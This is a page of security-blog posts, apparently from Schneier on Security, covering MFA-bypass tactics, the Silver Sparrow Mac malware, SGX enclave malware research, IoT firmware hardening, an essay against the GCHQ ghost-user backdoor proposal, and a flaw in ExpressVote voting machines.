Entries Tagged "computer security"

Page 2 of 33

Bypassing Two-Factor Authentication

These techniques are not new, but they’re increasingly popular:

…some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection.

[…]

Methods include:

  • Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop.
  • Sending one or two prompts per day. This method often attracts less attention, but “there is still a good chance the target will accept the MFA request.”
  • Calling the target, pretending to be part of the company, and telling the target they need to send an MFA request as part of a company process.

FIDO2 multi-factor authentication systems are not susceptible to these attacks, because they are tied to a physical computer.

And even though there are attacks against these two-factor systems, they’re much more secure than not having them at all. If nothing else, they block pretty much all automated attacks.

Posted on April 1, 2022 at 6:12 AMView Comments

Mysterious Macintosh Malware

This is weird:

Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the infected 30,000 machines, leaving the malware’s ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.

Also curious, the malware comes with a mechanism to completely remove itself, a capability that’s typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists.

Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so. The malicious binary is more mysterious still because it uses the macOS Installer JavaScript API to execute commands. That makes it hard to analyze installation package contents or the way that package uses the JavaScript commands.

The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany. Its use of Amazon Web Services and the Akamai content delivery network ensures the command infrastructure works reliably and also makes blocking the servers harder. Researchers from Red Canary, the security firm that discovered the malware, are calling the malware Silver Sparrow.

Feels government-designed, rather than criminal or hacker.

Another article. And the Red Canary analysis.

Posted on March 2, 2021 at 6:05 AMView Comments

Mapping Security and Privacy Research across the Decades

This is really interesting: “A Data-Driven Reflection on 36 Years of Security and Privacy Research,” by Aniqua Baset and Tamara Denning:

Abstract: Meta-research—research about research—allows us, as a community, to examine trends in our research and make informed decisions regarding the course of our future research activities. Additionally, overviews of past research are particularly useful for researchers or conferences new to the field. In this work we use topic modeling to identify topics within the field of security and privacy research using the publications of the IEEE Symposium on Security & Privacy (1980-2015), the ACM Conference on Computer and Communications Security (1993-2015), the USENIX Security Symposium (1993-2015), and the Network and Distributed System Security Symposium (1997-2015). We analyze and present data via the perspective of topics trends and authorship. We believe our work serves to contextualize the academic field of computer security and privacy research via one of the first data-driven analyses. An interactive visualization of the topics and corresponding publications is available at https://secprivmeta.net.

I like seeing how our field has morphed over the years.

Posted on October 24, 2019 at 6:21 AMView Comments

Measuring the Security of IoT Devices

In August, CyberITL completed a large-scale survey of software security practices in the IoT environment, by looking at the compiled software.

Data Collected:

  • 22 Vendors
  • 1,294 Products
  • 4,956 Firmware versions
  • 3,333,411 Binaries analyzed
  • Date range of data: 2003-03-24 to 2019-01-24 (varies by vendor, most up to 2018 releases)

[…]

This dataset contains products such as home routers, enterprise equipment, smart cameras, security devices, and more. It represents a wide range of either found in the home, enterprise or government deployments.

Vendors are Asus, Belkin, DLink, Linksys, Moxa, Tenda, Trendnet, and Ubiquiti.

CyberITL’s methodology is not source code analysis. They look at the actual firmware. And they don’t look for vulnerabilities; they look for secure coding practices that indicate that the company is taking security seriously, and whose lack pretty much guarantees that there will be vulnerabilities. These include address space layout randomization and stack guards.

A summary of their results.

CITL identified a number of important takeaways from this study:

  • On average, updates were more likely to remove hardening features than add them.
  • Within our 15 year data set, there have been no positive trends from any one vendor.
  • MIPS is both the most common CPU architecture and least hardened on average.
  • There are a large number of duplicate binaries across multiple vendors, indicating a common build system or toolchain.

Their website contains the raw data.

Posted on October 3, 2019 at 6:28 AMView Comments

Attacking the Intel Secure Enclave

Interesting paper by Michael Schwarz, Samuel Weiser, Daniel Gruss. The upshot is that both Intel and AMD have assumed that trusted enclaves will run only trustworthy code. Of course, that’s not true. And there are no security mechanisms that can deal with malicious enclaves, because the designers couldn’t imagine that they would be necessary. The results are predictable.

The paper: “Practical Enclave Malware with Intel SGX.”

Abstract: Modern CPU architectures offer strong isolation guarantees towards user applications in the form of enclaves. For instance, Intel’s threat model for SGX assumes fully trusted enclaves, yet there is an ongoing debate on whether this threat model is realistic. In particular, it is unclear to what extent enclave malware could harm a system. In this work, we practically demonstrate the first enclave malware which fully and stealthily impersonates its host application. Together with poorly-deployed application isolation on personal computers, such malware can not only steal or encrypt documents for extortion, but also act on the user’s behalf, e.g., sending phishing emails or mounting denial-of-service attacks. Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code-reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits. With our results, we seek to demystify the enclave malware threat and lay solid ground for future research on and defense against enclave malware.

Posted on August 30, 2019 at 6:18 AMView Comments

Evaluating the GCHQ Exceptional Access Proposal

The so-called Crypto Wars have been going on for 25 years now. Basically, the FBI—and some of their peer agencies in the UK, Australia, and elsewhere—argue that the pervasive use of civilian encryption is hampering their ability to solve crimes and that they need the tech companies to make their systems susceptible to government eavesdropping. Sometimes their complaint is about communications systems, like voice or messaging apps. Sometimes it’s about end-user devices. On the other side of this debate is pretty much all technologists working in computer security and cryptography, who argue that adding eavesdropping features fundamentally makes those systems less secure.

A recent entry in this debate is a proposal by Ian Levy and Crispin Robinson, both from the UK’s GCHQ (the British signals-intelligence agency—basically, its NSA). It’s actually a positive contribution to the discourse around backdoors; most of the time government officials broadly demand that the tech companies figure out a way to meet their requirements, without providing any details. Levy and Robinson write:

In a world of encrypted services, a potential solution could be to go back a few decades. It’s relatively easy for a service provider to silently add a law enforcement participant to a group chat or call. The service provider usually controls the identity system and so really decides who’s who and which devices are involved—they’re usually involved in introducing the parties to a chat or call. You end up with everything still being end-to-end encrypted, but there’s an extra ‘end’ on this particular communication. This sort of solution seems to be no more intrusive than the virtual crocodile clips that our democratically elected representatives and judiciary authorise today in traditional voice intercept solutions and certainly doesn’t give any government power they shouldn’t have.

On the surface, this isn’t a big ask. It doesn’t affect the encryption that protects the communications. It only affects the authentication that assures people of whom they are talking to. But it’s no less dangerous a backdoor than any others that have been proposed: It exploits a security vulnerability rather than fixing it, and it opens all users of the system to exploitation of that same vulnerability by others.

In a blog post, cryptographer Matthew Green summarized the technical problems with this GCHQ proposal. Basically, making this backdoor work requires not only changing the cloud computers that oversee communications, but it also means changing the client program on everyone’s phone and computer. And that change makes all of those systems less secure. Levy and Robinson make a big deal of the fact that their backdoor would only be targeted against specific individuals and their communications, but it’s still a general backdoor that could be used against anybody.

The basic problem is that a backdoor is a technical capability—a vulnerability—that is available to anyone who knows about it and has access to it. Surrounding that vulnerability is a procedural system that tries to limit access to that capability. Computers, especially internet-connected computers, are inherently hackable, limiting the effectiveness of any procedures. The best defense is to not have the vulnerability at all.

That old physical eavesdropping system Levy and Robinson allude to also exploits a security vulnerability. Because telephone conversations were unencrypted as they passed through the physical wires of the phone system, the police were able to go to a switch in a phone company facility or a junction box on the street and manually attach alligator clips to a specific pair and listen in to what that phone transmitted and received. It was a vulnerability that anyone could exploit—not just the police—but was mitigated by the fact that the phone company was a monolithic monopoly, and physical access to the wires was either difficult (inside a phone company building) or obvious (on the street at a junction box).

The functional equivalent of physical eavesdropping for modern computer phone switches is a requirement of a 1994 U.S. law called CALEA—and similar laws in other countries. By law, telephone companies must engineer phone switches that the government can eavesdrop, mirroring that old physical system with computers. It is not the same thing, though. It doesn’t have those same physical limitations that make it more secure. It can be administered remotely. And it’s implemented by a computer, which makes it vulnerable to the same hacking that every other computer is vulnerable to.

This isn’t a theoretical problem; these systems have been subverted. The most public incident dates from 2004 in Greece. Vodafone Greece had phone switches with the eavesdropping feature mandated by CALEA. It was turned off by default in the Greek phone system, but the NSA managed to surreptitiously turn it on and use it to eavesdrop on the Greek prime minister and over 100 other high-ranking dignitaries.

There’s nothing distinct about a phone switch that makes it any different from other modern encrypted voice or chat systems; any remotely administered backdoor system will be just as vulnerable. Imagine a chat program added this GCHQ backdoor. It would have to add a feature that added additional parties to a chat from somewhere in the system—and not by the people at the endpoints. It would have to suppress any messages alerting users to another party being added to that chat. Since some chat programs, like iMessage and Signal, automatically send such messages, it would force those systems to lie to their users. Other systems would simply never implement the “tell me who is in this chat conversation” feature­which amounts to the same thing.

And once that’s in place, every government will try to hack it for its own purposes­—just as the NSA hacked Vodafone Greece. Again, this is nothing new. In 2010, China successfully hacked the back-door mechanism Google put in place to meet law-enforcement requests. In 2015, someone—we don’t know who—hacked an NSA backdoor in a random-number generator used to create encryption keys, changing the parameters so they could also eavesdrop on the communications. There are certainly other stories that haven’t been made public.

Simply adding the feature erodes public trust. If you were a dissident in a totalitarian country trying to communicate securely, would you want to use a voice or messaging system that is known to have this sort of backdoor? Who would you bet on, especially when the cost of losing the bet might be imprisonment or worse: the company that runs the system, or your country’s government intelligence agency? If you were a senior government official, or the head of a large multinational corporation, or the security manager or a critical technician at a power plant, would you want to use this system?

Of course not.

Two years ago, there was a rumor of a WhatsApp backdoor. The details are complicated, and calling it a backdoor or a vulnerability is largely inaccurate—but the resultant confusion caused some people to abandon the encrypted messaging service.

Trust is fragile, and transparency is essential to trust. And while Levy and Robinson state that “any exceptional access solution should not fundamentally change the trust relationship between a service provider and its users,” this proposal does exactly that. Communications companies could no longer be honest about what their systems were doing, and we would have no reason to trust them if they tried.

In the end, all of these exceptional access mechanisms, whether they exploit existing vulnerabilities that should be closed or force vendors to open new ones, reduce the security of the underlying system. They reduce our reliance on security technologies we know how to do well—cryptography—to computer security technologies we are much less good at. Even worse, they replace technical security measures with organizational procedures. Whether it’s a database of master keys that could decrypt an iPhone or a communications switch that orchestrates who is securely chatting with whom, it is vulnerable to attack. And it will be attacked.

The foregoing discussion is a specific example of a broader discussion that we need to have, and it’s about the attack/defense balance. Which should we prioritize? Should we design our systems to be open to attack, in which case they can be exploited by law enforcement—and others? Or should we design our systems to be as secure as possible, which means they will be better protected from hackers, criminals, foreign governments and—unavoidably—law enforcement as well?

This discussion is larger than the FBI’s ability to solve crimes or the NSA’s ability to spy. We know that foreign intelligence services are targeting the communications of our elected officials, our power infrastructure, and our voting systems. Do we really want some foreign country penetrating our lawful-access backdoor in the same way the NSA penetrated Greece’s?

I have long maintained that we need to adopt a defense-dominant strategy: We should prioritize our need for security over our need for surveillance. This is especially true in the new world of physically capable computers. Yes, it will mean that law enforcement will have a harder time eavesdropping on communications and unlocking computing devices. But law enforcement has other forensic techniques to collect surveillance data in our highly networked world. We’d be much better off increasing law enforcement’s technical ability to investigate crimes in the modern digital world than we would be to weaken security for everyone. The ability to surreptitiously add ghost users to a conversation is a vulnerability, and it’s one that we would be better served by closing than exploiting.

This essay originally appeared on Lawfare.com.

EDITED TO ADD (1/30): More commentary.

Posted on January 18, 2019 at 5:54 AMView Comments

Security Vulnerability in ESS ExpressVote Touchscreen Voting Computer

Of course the ESS ExpressVote voting computer will have lots of security vulnerabilities. It’s a computer, and computers have lots of vulnerabilities. This particular vulnerability is particularly interesting because it’s the result of a security mistake in the design process. Someone didn’t think the security through, and the result is a voter-verifiable paper audit trail that doesn’t provide the security it promises.

Here are the details:

Now there’s an even worse option than “DRE with paper trail”; I call it “press this button if it’s OK for the machine to cheat” option. The country’s biggest vendor of voting machines, ES&S, has a line of voting machines called ExpressVote. Some of these are optical scanners (which are fine), and others are “combination” machines, basically a ballot-marking device and an optical scanner all rolled into one.

This video shows a demonstration of ExpressVote all-in-one touchscreens purchased by Johnson County, Kansas. The voter brings a blank ballot to the machine, inserts it into a slot, chooses candidates. Then the machine prints those choices onto the blank ballot and spits it out for the voter to inspect. If the voter is satisfied, she inserts it back into the slot, where it is counted (and dropped into a sealed ballot box for possible recount or audit).

So far this seems OK, except that the process is a bit cumbersome and not completely intuitive (watch the video for yourself). It still suffers from the problems I describe above: voter may not carefully review all the choices, especially in down-ballot races; counties need to buy a lot more voting machines, because voters occupy the machine for a long time (in contrast to op-scan ballots, where they occupy a cheap cardboard privacy screen).

But here’s the amazingly bad feature: “The version that we have has an option for both ways,” [Johnson County Election Commissioner Ronnie] Metsker said. “We instruct the voters to print their ballots so that they can review their paper ballots, but they’re not required to do so. If they want to press the button ‘cast ballot,’ it will cast the ballot, but if they do so they are doing so with full knowledge that they will not see their ballot card, it will instead be cast, scanned, tabulated and dropped in the secure ballot container at the backside of the machine.” [TYT Investigates, article by Jennifer Cohn, September 6, 2018]

Now it’s easy for a hacked machine to cheat undetectably! All the fraudulent vote-counting program has to do is wait until the voter chooses between “cast ballot without inspecting” and “inspect ballot before casting.” If the latter, then don’t cheat on this ballot. If the former, then change votes how it likes, and print those fraudulent votes on the paper ballot, knowing that the voter has already given up the right to look at it.

A voter-verifiable paper audit trail does not require every voter to verify the paper ballot. But it does require that every voter be able to verify the paper ballot. I am continuously amazed by how bad electronic voting machines are. Yes, they’re computers. But they also seem to be designed by people who don’t understand computer (or any) security.

Posted on September 20, 2018 at 6:45 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.